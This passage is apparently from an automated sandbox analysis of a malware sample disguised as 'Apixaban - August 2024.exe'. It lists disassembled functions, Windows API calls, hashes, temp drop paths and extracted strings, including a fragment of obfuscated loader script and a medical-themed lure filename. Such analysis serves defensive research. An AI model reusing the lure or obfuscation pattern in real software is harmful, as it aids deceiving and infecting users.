                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                                • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                • ShowWindow.USER32(00000000), ref: 004050EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                                • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                • Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                                • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
                                                • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                  • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: ';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                                • API String ID: 2246997448-3324853277
                                                • Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                                • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                • Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                                • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren, xrefs: 004020F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren
                                                • API String ID: 542301482-1051084359
                                                • Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                                • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                                                • Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                                • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                                Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                • Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                                • GetSysColor.USER32(?), ref: 004043AA
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                • lstrlenW.KERNEL32(?), ref: 004043CB
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                • SendMessageW.USER32(00000000), ref: 0040444D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                • SetCursor.USER32(00000000), ref: 004044CC
                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                • SetCursor.USER32(00000000), ref: 004044F0
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: : Completed$AB@$N$open
                                                • API String ID: 3615053054-1317861079
                                                • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                • wsprintfA.USER32 ref: 00405C7E
                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                • API String ID: 1265525490-3322868524
                                                • Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                • Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1140343847
                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                • GetSysColor.USER32(00000000), ref: 004041CD
                                                • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                • SetBkMode.GDI32(?,?), ref: 004041E5
                                                • GetSysColor.USER32(?), ref: 004041F8
                                                • SetBkColor.GDI32(?,?), ref: 00404208
                                                • DeleteObject.GDI32(?), ref: 00404222
                                                • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                  • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Strings
                                                Memory Dump Source
